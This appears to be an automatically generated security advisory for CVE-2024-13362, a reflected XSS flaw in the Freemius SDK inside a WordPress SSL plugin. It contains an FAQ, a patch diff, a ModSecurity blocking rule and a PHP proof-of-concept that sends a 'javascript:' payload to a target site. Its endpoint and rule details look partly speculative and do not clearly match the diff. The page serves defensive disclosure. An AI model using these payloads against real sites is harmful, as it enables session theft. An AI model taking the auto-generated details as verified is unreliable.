What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK in WordPress plugins and themes. It allows unauthenticated attackers to inject arbitrary JavaScript code via the ‘url’ parameter, which can execute in the user’s browser when they click a specially crafted link.

Which versions of the Freemius SDK are affected?

The vulnerability affects Freemius SDK versions 2.10.1 and earlier. WordPress plugins and themes that bundle these versions are also at risk.

How can I check if my site is affected?

To determine if your site is affected, check the version of the Freemius SDK used in your WordPress plugins or themes. If it is version 2.10.1 or earlier, your site is vulnerable to this XSS issue.

What is the severity of this vulnerability?

CVE-2024-13362 has a CVSS score of 6.1, which is classified as medium severity. This indicates that while exploitation is possible, it requires user interaction, making it less critical than high-severity vulnerabilities.

How does the exploitation process work?

An attacker can craft a malicious link containing a ‘url’ parameter with an XSS payload. When a user clicks this link while logged into the WordPress admin panel, the injected script can execute, potentially compromising the user’s session or performing unauthorized actions.

What actions should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius SDK to version 2.11.0 or later. Additionally, review and sanitize all user inputs in your custom code to prevent similar vulnerabilities.

What does the patch for this vulnerability involve?

The patch in version 2.11.0 removes direct interpolation of the vulnerable ‘url’ parameter into HTML. It wraps the trial promotion message in a container and applies filters correctly, preventing arbitrary URL injection.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to arbitrary JavaScript execution in the context of the WordPress admin dashboard. This could allow attackers to steal session cookies, perform actions on behalf of the victim, or redirect users to malicious sites.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can construct a URL with a malicious payload using the vulnerable ‘url’ parameter. By testing this URL, the attacker can verify if the XSS vulnerability exists by observing the execution of the injected script.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web page that reflects user input back to the browser without proper sanitization. This type of XSS relies on user interaction to trigger the script execution.

Who should be concerned about this vulnerability?

WordPress administrators, security professionals, and developers using plugins or themes that include the Freemius SDK should be concerned about this vulnerability. It is essential for them to ensure their sites are updated and secure.

What should I do if I cannot update immediately?

If you cannot update immediately, consider disabling the affected plugins or themes until a patch can be applied. Additionally, monitor your site for unusual activity and educate users about the risks of clicking untrusted links.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 17, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (auto-install-free-ssl)

CVE ID CVE-2024-13362

Plugin auto-install-free-ssl

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 4.5.0

Patched Version 4.5.1

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:
This vulnerability is a reflected DOM-based cross-site scripting (XSS) issue affecting the Freemius SDK (versions 2.10.1 and earlier) which is bundled in multiple WordPress plugins and themes. An unauthenticated attacker can inject arbitrary JavaScript code via the ‘url’ parameter, leading to script execution when a victim clicks a crafted link. The vulnerability has a CVSS score of 6.1 (medium severity) and is classified under CWE-79.

Root Cause:
The root cause lies in insufficient input sanitization and output escaping in the Freemius SDK’s handling of the ‘url’ parameter, specifically in the trial promotion notice rendering logic. The vulnerable code is located in `auto-install-free-ssl/freemius/includes/class-freemius.php`, around lines 24000-24015. The `trial_promotion_message` filter is applied to user-controlled data (including the URL parameter) before it is passed to the `_admin_notices->add_sticky()` method without proper escaping for HTML context. The URL is also directly interpolated into an `` tag’s `href` attribute (line 24003: `$trial_url`), which could allow `javascript:` URIs if input validation is bypassed.

Exploitation:
An attacker crafts a malicious link containing a `url` parameter with XSS payloads, such as `javascript:alert(document.cookie)` or an encoded script injection. The victim must click the link while authenticated to the WordPress admin panel. The Freemius SDK renders the trial promotion notice using the attacker-controlled URL, causing the malicious script to execute in the victim’s browser context. No authentication is required to trigger the reflected XSS, as the vulnerable notice display logic does not enforce proper access controls on the parameter.

Patch Analysis:
The patch in Freemius 2.11.0 modifies the trial promotion message construction in `class-freemius.php`. The vulnerable `$trial_url` variable is removed from direct string interpolation. Instead, the message is wrapped in a `

` container with class `fs-trial-message-container`, and the button is placed as a separate `

` element. The URL is now passed through the `apply_filters` function for the message but not embedded directly as a raw attribute. This prevents arbitrary URL injection into the HTML structure. Additionally, other files in the diff address PHP 8.2 compatibility warnings and version bumps, though these are not directly related to the XSS fix.

Impact:
Successful exploitation allows arbitrary JavaScript execution in the context of the admin dashboard. An attacker can steal session cookies, perform administrative actions on behalf of the victim (such as creating users or installing plugins), redirect the victim to malicious sites, or exfiltrate sensitive data. This compromises the confidentiality and integrity of the WordPress site and its users.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/auto-install-free-ssl/auto-install-free-ssl.php
+++ b/auto-install-free-ssl/auto-install-free-ssl.php
@@ -6,7 +6,7 @@
  * Plugin Name: Auto-Install Free SSL
  * Plugin URI:  https://freessl.tech
  * Description: Generate & install Free SSL Certificates, activate force HTTPS redirect with one click to fix insecure links & mixed content warnings, and get automatic Renewal Reminders.
- * Version:     4.5.0
+ * Version:     4.5.1
  * Requires at least: 4.1
  * Requires PHP:      5.6
  * Author:      Free SSL Dot Tech
--- a/auto-install-free-ssl/freemius/includes/class-freemius.php
+++ b/auto-install-free-ssl/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/auto-install-free-ssl/freemius/includes/class-fs-plugin-updater.php
+++ b/auto-install-free-ssl/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/auto-install-free-ssl/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/auto-install-free-ssl/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/auto-install-free-ssl/freemius/includes/entities/class-fs-site.php
+++ b/auto-install-free-ssl/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/auto-install-free-ssl/freemius/includes/entities/class-fs-user.php
+++ b/auto-install-free-ssl/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/auto-install-free-ssl/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/auto-install-free-ssl/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/auto-install-free-ssl/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/auto-install-free-ssl/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/auto-install-free-ssl/freemius/start.php
+++ b/auto-install-free-ssl/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362
# Blocks reflected XSS via Freemius trial promotion URL parameter
# Targets the vulnerable page and parameter with common XSS patterns
SecRule REQUEST_URI "@beginsWith /wp-admin/admin.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx (?:javascript|data|vbscript):" "chain"
    SecRule ARGS_GET:page "@streq freemius-trial" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

$target_url = 'http://wordpress.local'; // Change this to the target WordPress site URL

// The vulnerable parameter is 'url' passed via GET or POST
$payload = 'javascript:alert(document.domain)';
$endpoint = $target_url . '/wp-admin/admin.php?page=freemius-trial&url=' . urlencode($payload);

echo "[+] Testing reflected XSS at: $endpointn";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/dev/null'); // Read cookies if session exists
curl_setopt($ch, CURLOPT_HTTPHEADER, array('User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP response code: $http_coden";

// Check if the payload is reflected in the response
if (strpos($response, $payload) !== false) {
    echo "[!] Vulnerability confirmed: The 'url' parameter is reflected without sanitization.n";
    echo "[!] Payload used: $payloadn";
} else {
    echo "[-] Payload not reflected. The site may be patched or requires authentication.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK in WordPress plugins and themes. It allows unauthenticated attackers to inject arbitrary JavaScript code via the ‘url’ parameter, which can execute in the user’s browser when they click a specially crafted link.
Which versions of the Freemius SDK are affected?
Identifying vulnerable versions
The vulnerability affects Freemius SDK versions 2.10.1 and earlier. WordPress plugins and themes that bundle these versions are also at risk.
How can I check if my site is affected?
Identifying vulnerable installations
To determine if your site is affected, check the version of the Freemius SDK used in your WordPress plugins or themes. If it is version 2.10.1 or earlier, your site is vulnerable to this XSS issue.
What is the severity of this vulnerability?
Understanding the risk level
CVE-2024-13362 has a CVSS score of 6.1, which is classified as medium severity. This indicates that while exploitation is possible, it requires user interaction, making it less critical than high-severity vulnerabilities.
How does the exploitation process work?
Mechanics of the attack
An attacker can craft a malicious link containing a ‘url’ parameter with an XSS payload. When a user clicks this link while logged into the WordPress admin panel, the injected script can execute, potentially compromising the user’s session or performing unauthorized actions.
What actions should I take to mitigate this vulnerability?
Recommended fixes
To mitigate this vulnerability, update the Freemius SDK to version 2.11.0 or later. Additionally, review and sanitize all user inputs in your custom code to prevent similar vulnerabilities.
What does the patch for this vulnerability involve?
Details of the fix
The patch in version 2.11.0 removes direct interpolation of the vulnerable ‘url’ parameter into HTML. It wraps the trial promotion message in a container and applies filters correctly, preventing arbitrary URL injection.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to arbitrary JavaScript execution in the context of the WordPress admin dashboard. This could allow attackers to steal session cookies, perform actions on behalf of the victim, or redirect users to malicious sites.
How does the proof of concept demonstrate the vulnerability?
Understanding the example code
The proof of concept shows how an attacker can construct a URL with a malicious payload using the vulnerable ‘url’ parameter. By testing this URL, the attacker can verify if the XSS vulnerability exists by observing the execution of the injected script.
What is reflected DOM-based XSS?
Defining the type of vulnerability
Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web page that reflects user input back to the browser without proper sanitization. This type of XSS relies on user interaction to trigger the script execution.
Who should be concerned about this vulnerability?
Identifying stakeholders
WordPress administrators, security professionals, and developers using plugins or themes that include the Freemius SDK should be concerned about this vulnerability. It is essential for them to ensure their sites are updated and secure.
What should I do if I cannot update immediately?
Interim measures
If you cannot update immediately, consider disabling the affected plugins or themes until a patch can be applied. Additionally, monitor your site for unusual activity and educate users about the risks of clicking untrusted links.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations